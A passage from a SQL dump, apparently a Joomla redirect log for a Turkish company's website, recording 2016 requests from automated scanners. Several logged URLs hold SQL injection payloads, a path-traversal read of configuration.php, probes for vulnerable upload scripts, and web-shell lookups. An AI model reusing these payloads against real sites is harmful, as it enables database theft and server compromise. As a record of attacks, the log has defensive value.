00:00:00',301),(8008,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/components//cfg-contactform-4/inc/upload.php','','','',1,0,'2016-02-15 07:29:37','0000-00-00 00:00:00',301),(8009,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/components//cfg-contactform-5/inc/upload.php','','','',1,0,'2016-02-15 07:29:38','0000-00-00 00:00:00',301),(8010,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/components//components/com_hwdvideoshare/assets/uploads/flash/flash_upload.php?jqUploader=1','','','',1,0,'2016-02-15 07:29:38','0000-00-00 00:00:00',301),(8011,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/components//cfg-contactform-6/inc/upload.php','','','',1,0,'2016-02-15 07:29:40','0000-00-00 00:00:00',301),(8012,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/components/components/com_creativecontactform/fileupload/index.php','','','',1,0,'2016-02-15 07:29:40','0000-00-00 00:00:00',301),(8013,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/components/index.php?option=com_myblog&task=ajaxupload','','','',1,0,'2016-02-15 07:29:41','0000-00-00 00:00:00',301),(8014,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/components//cfg-contactform-7/inc/upload.php','','','',1,0,'2016-02-15 07:29:41','0000-00-00 00:00:00',301),(8015,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/components//cfg-contactform-8/inc/upload.php','','','',1,0,'2016-02-15 07:29:42','0000-00-00 00:00:00',301),(8016,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/components/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1','','','',1,0,'2016-02-15 07:29:42','0000-00-00 00:00:00',301),(8017,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/components//cfg-contactform-9/inc/upload.php','','','',1,0,'2016-02-15 07:29:43','0000-00-00 00:00:00',301),(8018,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/components//cfg-contactform-10/inc/upload.php','','','',1,0,'2016-02-15 07:29:43','0000-00-00 00:00:00',301),(8019,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/components//cfg-contactform-11/inc/upload.php','','','',1,0,'2016-02-15 07:29:44','0000-00-00 00:00:00',301),(8020,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/components//cfg-contactform-12/inc/upload.php','','','',1,0,'2016-02-15 07:29:45','0000-00-00 00:00:00',301),(8021,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/components//cfg-contactform-13/inc/upload.php','','','',1,0,'2016-02-15 07:29:45','0000-00-00 00:00:00',301),(8022,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/components//cfg-contactform-14/inc/upload.php','','','',1,0,'2016-02-15 07:29:46','0000-00-00 00:00:00',301),(8023,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/components//cfg-contactform-15/inc/upload.php','','','',1,0,'2016-02-15 07:29:47','0000-00-00 00:00:00',301),(8024,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/components//cfg-contactform-16/inc/upload.php','','','',1,0,'2016-02-15 07:29:47','0000-00-00 00:00:00',301),(8025,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/components//cfg-contactform-17/inc/upload.php','','','',1,0,'2016-02-15 07:29:48','0000-00-00 00:00:00',301),(8026,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/components//cfg-contactform-18/inc/upload.php','','','',1,0,'2016-02-15 07:29:48','0000-00-00 00:00:00',301),(8027,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/components//cfg-contactform-19/inc/upload.php','','','',1,0,'2016-02-15 07:29:49','0000-00-00 00:00:00',301),(8028,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/components//cfg-contactform-20/inc/upload.php','','','',1,0,'2016-02-15 07:29:50','0000-00-00 00:00:00',301),(8029,'https://www.3s-technologies.com.tr/3s-technologies.com.tr/joomla/index.php/en/using-joomla/extensions/components/content-component/administrator/templates/hathor/images/header/icon-48-help_header.png','','','',4,0,'2016-02-19 08:37:19','0000-00-00 00:00:00',301),(8030,'http://3s-technologies.com.tr/index.php/en/','','','',12,0,'2016-02-21 04:14:24','0000-00-00 00:00:00',301),(8031,'https://www.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php/en/using-joomla/extensions/components/content-component/article-categories/images/sampledata/parks/banner_cradle.jpg','','','',1,0,'2016-02-22 03:44:17','0000-00-00 00:00:00',301),(8032,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/modules/\"http://help.joomla.org/proxy/index.php?option=com_help&keyref=Help16:Extensions_Module_Manager_Menu\">Help</a></p>','','','',1,0,'2016-02-27 04:49:17','0000-00-00 00:00:00',301),(8033,'https://www.3s-technologies.com.tr/3s-technologies.com.tr/joomla/index.php/en/using-joomla/extensions/components/content-component/article-categories/images/sampledata/parks/banner_cradle.jpg','','','',4,0,'2016-03-01 16:36:16','0000-00-00 00:00:00',301),(8034,'http://3s-technologies.com.tr/index.php/en/wp-admin/','','http://3s-technologies.com.tr/index.php/en/products/wp-admin/','',6,0,'2016-03-01 17:35:25','0000-00-00 00:00:00',301),(8035,'http://3s-technologies.com.tr/index.php/en/wp-admin/wp-login.php','','http://3s-technologies.com.tr/index.php/en/wp-admin/','',6,0,'2016-03-01 17:35:26','0000-00-00 00:00:00',301),(8036,'http://3s-technologies.com.tr/index.php/en/wp-admin','','http://3s-technologies.com.tr/index.php/en/wp-admin/wp-login.php','',6,0,'2016-03-01 17:35:27','0000-00-00 00:00:00',301),(8037,'http://3s-technologies.com.tr/index.php?option=com_component?id=1/index.php?option=com_mydyngallery&Itemid=&task=liste&directory=1','','','',4,0,'2016-03-01 23:55:09','0000-00-00 00:00:00',301),(8038,'http://3s-technologies.com.tr/index.php?option=com_component?id=1/index.php?option=com_mydyngallery&directory=1','','','',1,0,'2016-03-01 23:55:11','0000-00-00 00:00:00',301),(8039,'https://www.nova-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php/tr/using-joomla/extensions/components/content-component/administrator/templates/hathor/images/header/icon-48-help_header.png','','','',3,0,'2016-03-03 20:12:50','0000-00-00 00:00:00',301),(8040,'http://www.3s-technologies.com.tr/index.php?option=com_hdflvplayer&id=-0 UNION ALL SELECT CONCAT(0x776F6F79756E),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NU','','','',1,0,'2016-03-04 15:06:27','0000-00-00 00:00:00',301),(8041,'http://www.3s-technologies.com.tr/index.php?option=com_osproperty&lang=en&no_html=1&tmpl=component&task=ajax_loadStateInListPage&country_id=0\' and(select 1 from(select count(*),concat((select (select (select concat(0x7e,0x776F6F79756E,0x7e))) from informa','','','',1,0,'2016-03-04 15:06:27','0000-00-00 00:00:00',301),(8042,'http://www.3s-technologies.com.tr/index.php?option=com_spidercontacts&contact_id=1 UNION SELECT 1,concat(0x776F6F79756E),3,4,5,6,7,8,9,10,11,12--&view=showcontact&lang=ca','','','',2,0,'2016-03-04 15:06:51','0000-00-00 00:00:00',301),(8043,'https://www.nova-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php/en/using-joomla/extensions/components/content-component/administrator/templates/hathor/images/header/icon-48-help_header.png','','','',4,0,'2016-03-17 03:02:28','0000-00-00 00:00:00',301),(8044,'http://www.3s-technologies.com.tr/index.php?option=com_content\'A=0&view=article&id=50&Itemid=66&lang=en','','http://www.3s-technologies.com.tr/index.php?option=com_content\'A=0&view=article&id=50&Itemid=66&lang=en','',1,0,'2016-03-19 12:29:15','0000-00-00 00:00:00',301),(8045,'http://3s-technologies.com.tr/index.php/en/?option=com_easyblog&view=dashboard&layout=write','','http://3s-technologies.com.tr/','',26,0,'2016-03-20 09:34:33','0000-00-00 00:00:00',301),(8046,'http://3s-technologies.com.tr/index.php/component/\'\"/lostpassword','','http://www.google.com/','',1,0,'2016-03-20 16:55:28','0000-00-00 00:00:00',301),(8047,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/ddm-novastar/index.php?option=com_jdownloads&Itemid=0&view=upload','','','',1,0,'2016-03-24 09:44:03','0000-00-00 00:00:00',301),(8048,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/ddm-novastar/index.php?option=com_adsmanager&task=upload&tmpl=component','','','',1,0,'2016-03-24 09:44:11','0000-00-00 00:00:00',301),(8049,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/ddm-novastar/index.php?option=com_myblog&task=ajaxupload','','','',1,0,'2016-03-24 09:44:13','0000-00-00 00:00:00',301),(8050,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/tolo/index.php?option=com_jdownloads&Itemid=0&view=upload','','','',1,0,'2016-03-24 09:44:40','0000-00-00 00:00:00',301),(8051,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/tolo/index.php?option=com_adsmanager&task=upload&tmpl=component','','','',1,0,'2016-03-24 09:44:50','0000-00-00 00:00:00',301),(8052,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/tolo/index.php?option=com_myblog&task=ajaxupload','','','',1,0,'2016-03-24 09:44:55','0000-00-00 00:00:00',301),(8053,'http://www.3s-technologies.com.tr/index.php/en/products/2.-el-makineler/rh2-detail','','','',43,0,'2016-03-25 09:49:31','0000-00-00 00:00:00',301),(8054,'http://www.3s-technologies.com.tr/index.php/en/products\'','','','',1,0,'2016-04-01 18:35:47','0000-00-00 00:00:00',301),(8055,'https://www.nova-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php/en/using-joomla/extensions/components/content-component/article-categories/images/sampledata/parks/banner_cradle.jpg','','','',2,0,'2016-04-06 17:13:33','0000-00-00 00:00:00',301),(8056,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/templates/atomic/home-page-atomic\'A=0','','http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/templates/atomic/home-page-atomic\'A=0','',1,0,'2016-04-10 19:24:57','0000-00-00 00:00:00',301),(8057,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/components/users-component/password-resetlanguage/en-GB/en-GB.xml','','','',1,0,'2016-04-11 18:15:03','0000-00-00 00:00:00',301),(8058,'http://www.3s-technologies.com.tr/index.php/en/language/en-GB/en-GB.xml','','http://www.3s-technologies.com.tr/index.php/language/en-GB/en-GB.xml','',1,0,'2016-04-11 18:15:04','0000-00-00 00:00:00',301),(8059,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/templates/beez-2/typography-beez-2language/en-GB/en-GB.xml','','','',1,0,'2016-04-12 02:34:42','0000-00-00 00:00:00',301),(8060,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/components/users-component/registration-formlanguage/en-GB/en-GB.xml','','','',1,0,'2016-04-12 08:30:04','0000-00-00 00:00:00',301),(8061,'http://3s-technologies.com.tr/index.php?option=com_k2','','','',10,0,'2016-04-13 13:37:54','0000-00-00 00:00:00',301),(8062,'http://3s-technologies.com.tr/index.php?option=com_comprofiler','','','',8,0,'2016-04-13 13:37:54','0000-00-00 00:00:00',301),(8063,'http://3s-technologies.com.tr/index.php?option=com_jambook','','','',10,0,'2016-04-13 13:37:54','0000-00-00 00:00:00',301),(8064,'http://3s-technologies.com.tr/index.php?option=com_myblog','','','',8,0,'2016-04-13 13:37:54','0000-00-00 00:00:00',301),(8065,'http://3s-technologies.com.tr/index.php?option=com_ccboard','','','',10,0,'2016-04-13 13:37:55','0000-00-00 00:00:00',301),(8066,'http://3s-technologies.com.tr/index.php?option=com_akobook','','','',10,0,'2016-04-13 13:37:58','0000-00-00 00:00:00',301),(8067,'http://3s-technologies.com.tr/index.php?option=com_community','','','',7,0,'2016-04-13 13:37:58','0000-00-00 00:00:00',301),(8068,'http://3s-technologies.com.tr/index.php?option=com_easygb','','','',10,0,'2016-04-13 13:37:58','0000-00-00 00:00:00',301),(8069,'http://3s-technologies.com.tr/index.php?option=com_easybookreloaded','','','',10,0,'2016-04-13 13:38:00','0000-00-00 00:00:00',301),(8070,'http://3s-technologies.com.tr/index.php?option=com_agorapro','','','',10,0,'2016-04-13 13:38:03','0000-00-00 00:00:00',301),(8071,'http://3s-technologies.com.tr/index.php?option=com_phocaguestbook','','','',8,0,'2016-04-13 13:38:04','0000-00-00 00:00:00',301),(8072,'http://3s-technologies.com.tr/index.php?option=com_joobb','','','',8,0,'2016-04-13 13:38:10','0000-00-00 00:00:00',301),(8073,'http://3s-technologies.com.tr/index.php?option=com_vitabook','','','',10,0,'2016-04-13 13:38:16','0000-00-00 00:00:00',301),(8074,'http://3s-technologies.com.tr/index.php?option=com_ninjaboard','','','',8,0,'2016-04-13 13:38:18','0000-00-00 00:00:00',301),(8075,'http://3s-technologies.com.tr/index.php?option=com_easysocial','','','',8,0,'2016-04-13 13:38:18','0000-00-00 00:00:00',301),(8076,'http://3s-technologies.com.tr/index.php?option=com_fireboard','','','',6,0,'2016-04-13 13:38:21','0000-00-00 00:00:00',301),(8077,'http://3s-technologies.com.tr/index.php?option=com_kunena','','','',8,0,'2016-04-13 13:38:21','0000-00-00 00:00:00',301),(8078,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/components/users-component/password-resetconfiguration.php?-s','','','',1,0,'2016-04-14 04:08:20','0000-00-00 00:00:00',301),(8079,'http://www.3s-technologies.com.tr/index.php/en/configuration.php?-s','','http://www.3s-technologies.com.tr/index.php/configuration.php?-s','',1,0,'2016-04-14 04:08:20','0000-00-00 00:00:00',301),(8080,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/templates/atomic/home-page-atomic/78-turkish-trconfiguration.php?-s','','','',1,0,'2016-04-14 12:17:10','0000-00-00 00:00:00',301),(8081,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/templates/beez-2/typography-beez-2configuration.php?-s','','','',1,0,'2016-04-14 12:26:04','0000-00-00 00:00:00',301),(8082,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/components/users-component/registration-formconfiguration.php?-s','','','',1,0,'2016-04-14 18:12:55','0000-00-00 00:00:00',301),(8083,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/components/users-component/password-resetindex.php?-s','','','',1,0,'2016-04-17 02:32:30','0000-00-00 00:00:00',301),(8084,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/templates/atomic/home-page-atomic/78-turkish-trindex.php?-s','','','',1,0,'2016-04-17 11:17:28','0000-00-00 00:00:00',301),(8085,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/templates/beez-2/typography-beez-2index.php?-s','','','',1,0,'2016-04-17 11:28:09','0000-00-00 00:00:00',301),(8086,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/components/users-component/registration-formindex.php?-s','','','',1,0,'2016-04-17 17:40:31','0000-00-00 00:00:00',301),(8087,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=73&Itemid=82&lang=tr','','','',1,0,'2016-04-17 20:58:21','0000-00-00 00:00:00',301),(8088,'http://www.3s-technologies.com.tr/index.php/tr/images/stories/petx.php?baca','','','',1,0,'2016-04-20 13:09:36','0000-00-00 00:00:00',301),(8089,'http://www.3s-technologies.com.tr/index.php/tr/images/stories/explore.php?baca','','','',1,0,'2016-04-20 13:09:39','0000-00-00 00:00:00',301),(8090,'http://www.3s-technologies.com.tr/index.php/tr/images/stories/magic.php.png','','','',1,0,'2016-04-20 13:10:05','0000-00-00 00:00:00',301),(8091,'http://www.3s-technologies.com.tr/index.php/tr/images/stories/magic.php.png?baca','','','',1,0,'2016-04-20 13:10:06','0000-00-00 00:00:00',301),(8092,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/components/users-component/password-resetadministrator/language/en-GB/en-GB.xml','','','',1,0,'2016-04-20 18:39:36','0000-00-00 00:00:00',301),(8093,'http://www.3s-technologies.com.tr/index.php/en/administrator/language/en-GB/en-GB.xml','','http://www.3s-technologies.com.tr/index.php/administrator/language/en-GB/en-GB.xml','',1,0,'2016-04-20 18:39:37','0000-00-00 00:00:00',301),(8094,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/templates/beez-2/typography-beez-2administrator/language/en-GB/en-GB.xml','','','',1,0,'2016-04-21 02:33:50','0000-00-00 00:00:00',301),(8095,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/components/users-component/registration-formadministrator/language/en-GB/en-GB.xml','','','',1,0,'2016-04-21 13:09:15','0000-00-00 00:00:00',301),(8096,'http://www.3s-technologies.com.tr/index.php/en/?option=com_kunena','','','',2,0,'2016-04-27 23:14:29','0000-00-00 00:00:00',301),(8097,'http://3s-technologies.com.tr/index.php/en/?option=com_user&view=register','','','',7,0,'2016-05-04 13:24:20','0000-00-00 00:00:00',301),(8098,'http://3s-technologies.com.tr/index.php/en/component/user/register','','','',3,0,'2016-05-04 13:24:23','0000-00-00 00:00:00',301),(8099,'http://3s-technologies.com.tr/index.php/en/?option=com_kunena','','','',1,0,'2016-05-09 09:34:26','0000-00-00 00:00:00',301),(8100,'http://www.3s-technologies.com.tr/index.php?id=166&Itemid=144&lang=en&option=com_content&view=article','','','',1,0,'2016-05-10 02:53:33','0000-00-00 00:00:00',301),(8101,'http://www.3s-technologies.com.tr/index.php?id=126&Itemid=133&lang=en&option=com_content&view=article','','','',1,0,'2016-05-12 02:29:25','0000-00-00 00:00:00',301),(8102,'http://www.3s-technologies.com.tr/index.php?id=117&Itemid=128&lang=tr&option=com_content&view=article','','','',1,0,'2016-05-12 08:19:51','0000-00-00 00:00:00',301),(8103,'http://www.3s-technologies.com.tr/index.php?catid=41:smd-firin&id=73:ly-8c&Itemid=82&lang=en&option=com_content&view=article','','','',1,0,'2016-05-12 15:41:31','0000-00-00 00:00:00',301),(8104,'http://www.3s-technologies.com.tr/index.php?id=54&Itemid=114&lang=en&option=com_content&view=category','','','',1,0,'2016-05-12 19:14:38','0000-00-00 00:00:00',301),(8105,'http://www.3s-technologies.com.tr/index.php/en/?option=com_easyblog','','','',1,0,'2016-05-17 21:27:44','0000-00-00 00:00:00',301),(8106,'http://3s-technologies.com.tr/index.php/login-form','','','',3,0,'2016-05-18 18:47:04','0000-00-00 00:00:00',301),(8107,'http://3s-technologies.com.tr/index.php/login','','','',9,0,'2016-05-18 18:47:05','0000-00-00 00:00:00',301),(8108,'http://3s-technologies.com.tr/index.php/register','','','',3,0,'2016-05-18 18:47:06','0000-00-00 00:00:00',301),(8109,'http://3s-technologies.com.tr/index.php/log-out','','','',3,0,'2016-05-18 18:47:07','0000-00-00 00:00:00',301),(8110,'http://3s-technologies.com.tr/index.php/tr/using-joomla/extensions/tr/using-joomla/extensions/components/users-component/registration-form?layout=complete','','http://3s-technologies.com.tr/index.php/tr/using-joomla/extensions/components/users-component/registration-form?task=registration.activate&token=4f846','',1,0,'2016-05-18 18:48:57','0000-00-00 00:00:00',301),(8111,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component//images/stories/explore.gif','','','',2,0,'2016-05-20 08:36:12','0000-00-00 00:00:00',301),(8112,'http://3s-technologies.com.tr/index.php/welcome.html','','','',7,0,'2016-05-27 20:41:51','0000-00-00 00:00:00',301),(8113,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/components/content-component/components/com_hdflvplayer/hdflvplayer/download.php?f=../../../configuration.php','','','',1,0,'2016-05-29 17:03:46','0000-00-00 00:00:00',301),(8114,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/components/content-component/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=mil.php','','','',1,0,'2016-05-29 17:03:50','0000-00-00 00:00:00',301),(8115,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/components/content-component/administrator/components/com_acymailing/inc/openflash/php-ofc-library/ofc_upload_image.php?name=mil.php','','','',1,0,'2016-05-29 17:03:52','0000-00-00 00:00:00',301),(8116,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/components/content-component/administrator/components/com_jnewsletter/includes/openflashchart/php-ofc-library/ofc_upload_image.php','','','',1,0,'2016-05-29 17:03:54','0000-00-00 00:00:00',301),(8117,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/components/content-component/administrator/components/com_civicrm/civicrm/packages/OpenFlashChart/php-ofc-library/ofc_upload_image.php','','','',1,0,'2016-05-29 17:03:56','0000-00-00 00:00:00',301),(8118,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/components/content-component/administrator/components/com_jinc/classes/graphics/php-ofc-library/ofc_upload_image.php','','','',1,0,'2016-05-29 17:03:58','0000-00-00 00:00:00',301),(8119,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/components/content-component/administrator/components/com_maianmedia/utilities/charts/php-ofc-library/ofc_upload_image.php','','','',1,0,'2016-05-29 17:04:00','0000-00-00 00:00:00',301),(8120,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/components/content-component/administrator/components/com_maian15/charts/php-ofc-library/ofc_upload_image.php','','','',1,0,'2016-05-29 17:04:03','0000-00-00 00:00:00',301),(8121,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/components/content-component/administrator/components/com_redmystic/chart/ofc-library/ofc_upload_image.php','','','',1,0,'2016-05-29 17:04:04','0000-00-00 00:00:00',301),(8122,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/components/content-component/administrator/components/com_joomleague/assets/classes/open-flash-chart/ofc_upload_image.php','','','',1,0,'2016-05-29 17:04:06','0000-00-00 00:00:00',301),(8123,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/components/content-component/administrator/components/com_bt_portfolio/helpers/uploadify/uploadify.php','','','',1,0,'2016-05-29 17:04:08','0000-00-00 00:00:00',301),(8124,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/components/content-component/index.php?option=com_jdownloads&Itemid=0&view=upload','','','',1,0,'2016-05-29 17:04:10','0000-00-00 00:00:00',301),(8125,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/components/content-component//cfg-contactform-1/inc/upload.php','','','',1,0,'2016-05-29 17:04:12','0000-00-00 00:00:00',301),(8126,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/components/content-component//cfg-contactform-2/inc/upload.php','','','',1,0,'2016-05-29 17:04:12','0000-00-00 00:00:00',301),(8127,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/components/content-component//cfg-contactform-3/inc/upload.php','','','',1,0,'2016-05-29 17:04:13','0000-00-00 00:00:00',301),(8128,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/components/content-component//cfg-contactform-4/inc/upload.php','','','',1,0,'2016-05-29 17:04:13','0000-00-00 00:00:00',301),(8129,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/components/content-component//cfg-contactform-5/inc/upload.php','','','',1,0,'2016-05-29 17:04:14','0000-00-00 00:00:00',301),(8130,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/components/content-component/components/com_sexycontactform/fileupload/index.php','','','',1,0,'2016-05-29 17:04:14','0000-00-00 00:00:00',301),(8131,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/components/content-component//cfg-contactform-6/inc/upload.php','','','',1,0,'2016-05-29 17:04:15','0000-00-00 00:00:00',301),(8132,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/components/content-component//cfg-contactform-7/inc/upload.php','','','',1,0,'2016-05-29 17:04:15','0000-00-00 00:00:00',301),(8133,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/components/content-component//cfg-contactform-8/inc/upload.php','','','',1,0,'2016-05-29 17:04:16','0000-00-00 00:00:00',301),(8134,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/components/content-component/components/com_creativecontactform/fileupload/index.php','','','',1,0,'2016-05-29 17:04:16','0000-00-00 00:00:00',301),(8135,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/components/content-component//cfg-contactform-9/inc/upload.php','','','',1,0,'2016-05-29 17:04:17','0000-00-00 00:00:00',301),(8136,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/components/content-component//cfg-contactform-10/inc/upload.php','','','',1,0,'2016-05-29 17:04:17','0000-00-00 00:00:00',301),(8137,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/components/content-component/index.php?option=com_adsmanager&task=upload&tmpl=component','','','',1,0,'2016-05-29 17:04:18','0000-00-00 00:00:00',301),(8138,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/components/content-component//cfg-contactform-11/inc/upload.php','','','',1,0,'2016-05-29 17:04:19','0000-00-00 00:00:00',301),(8139,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/components/content-component//cfg-contactform-12/inc/upload.php','','','',1,0,'2016-05-29 17:04:20','0000-00-00 00:00:00',301),(8140,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/components/content-component//components/com_hwdvideoshare/assets/uploads/flash/flash_upload.php?jqUploader=1','','','',1,0,'2016-05-29 17:04:20','0000-00-00 00:00:00',301),(8141,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/components/content-component//cfg-contactform-13/inc/upload.php','','','',1,0,'2016-05-29 17:04:21','0000-00-00 00:00:00',301),(8142,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/components/content-component//cfg-contactform-14/inc/upload.php','','','',1,0,'2016-05-29 17:04:22','0000-00-00 00:00:00',301),(8143,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/components/content-component/index.php?option=com_myblog&task=ajaxupload','','','',1,0,'2016-05-29 17:04:22','0000-00-00 00:00:00',301),(8144,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/components/content-component//cfg-contactform-15/inc/upload.php','','','',1,0,'2016-05-29 17:04:23','0000-00-00 00:00:00',301),(8145,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/components/content-component//cfg-contactform-16/inc/upload.php','','','',1,0,'2016-05-29 17:04:23','0000-00-00 00:00:00',301),(8146,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/components/content-component/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1','','','',1,0,'2016-05-29 17:04:24','0000-00-00 00:00:00',301),(8147,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/components/content-component//cfg-contactform-17/inc/upload.php','','','',1,0,'2016-05-29 17:04:24','0000-00-00 00:00:00',301),(8148,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/components/content-component//cfg-contactform-18/inc/upload.php','','','',1,0,'2016-05-29 17:04:25','0000-00-00 00:00:00',301),(8149,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/components/content-component//cfg-contactform-19/inc/upload.php','','','',1,0,'2016-05-29 17:04:26','0000-00-00 00:00:00',301),(8150,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/components/content-component//cfg-contactform-20/inc/upload.php','','','',1,0,'2016-05-29 17:04:26','0000-00-00 00:00:00',301),(8151,'http://www.3s-technologies.com.tr/index.php/en/?option=com_garyscookbook&func=newItem','','http://www.3s-technologies.com.tr/index.php?option=com_garyscookbook&func=newItem','',2,0,'2016-05-30 11:04:42','0000-00-00 00:00:00',301),(8152,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_easyblog&view=dashboard&layout=write','','http://www.3s-technologies.com.tr/','',5,0,'2016-06-02 01:08:00','0000-00-00 00:00:00',301),(8153,'http://www.3s-technologies.com.tr/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=1&type_id=1&list[select]=(select 1 from (select count(*),concat((select (select concat(username)) from #__users limit 0,1),floor(rand(0)*2))x from i','','','',1,0,'2016-06-06 16:41:43','0000-00-00 00:00:00',301),(8154,'http://3s-technologies.com.tr/index.php/en/sites/all/libraries/elfinder/connectors/php/connector.php','','http://3s-technologies.com.tr/index.php/en/sites/all/libraries/elfinder/connectors/php/connector.php','',1,0,'2016-06-12 02:01:17','0000-00-00 00:00:00',301),(8155,'http://www.3s-technologies.com.tr/index.php/en/?type_id=1&list[select]=polygon((/*!00000select*/*/*!00000from*/(/*!00000select*/*/*!00000from*/(/*!00000select*/concat_ws(0x7e3a,0x6d616b6d616e,version(),user()))``)``))&list[ordering]=&item_id=1&option=com_','','https://google.com/','',1,0,'2016-06-12 05:39:45','0000-00-00 00:00:00',301),(8156,'http://www.3s-technologies.com.tr/index.php/en/?type_id=1&view=history&item_id=1&list[ordering]=&option=com_contenthistory&list[select]=polygon((/*!00000select*/*/*!00000from*/(/*!00000select*/*/*!00000from*/(/*!00000select*/concat_ws(0x7e3a,0x6d616b6d616','','https://google.com/','',1,0,'2016-06-12 07:06:22','0000-00-00 00:00:00',301),(8157,'http://3s-technologies.com.tr/?option=com_tags','','','',5,0,'2016-06-12 07:51:53','0000-00-00 00:00:00',301),(8158,'http://3s-technologies.com.tr/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=1&type_id=1&list[select]=(select 1 from (select count(*),concat((select (select concat(username)) from #__users limit 0,1),floor(rand(0)*2))x from infor','','','',1,0,'2016-06-13 11:30:07','0000-00-00 00:00:00',301),(8159,'http://www.3s-technologies.com.tr/index.php/tr/ueurenler/smd-ultra-hız','','','',3,0,'2016-06-16 09:24:41','0000-00-00 